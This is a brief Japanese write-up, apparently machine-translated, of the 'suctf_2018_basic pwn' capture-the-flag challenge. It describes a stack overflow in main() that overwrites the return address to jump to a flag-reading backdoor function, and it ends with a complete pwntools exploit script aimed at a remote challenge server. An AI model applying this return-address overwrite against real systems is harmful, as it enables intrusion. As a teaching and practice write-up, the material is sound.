suctf_2018_basic pwn
ステップ
- 定期検査、64ビットプログラム、オープンRELROおよびNX
- プログラムを実行して、一般的な状況を確認してください
- 64ビットのidaがロードされ、文字列の検索時にフラグを読み取る関数が見つかりました。flag_addr= 0x401157
main()
がオーバーフローし、バックドア関数タイプの問題に対するリターンアドレスを上書きするだけです。
完全な経験
from pwn import *
r=remote('node3.buuoj.cn',25779)
flag_addr=0x401157
payload='a'*(0x110+8)+p64(flag_addr)
r.sendline(payload)
r.interactive()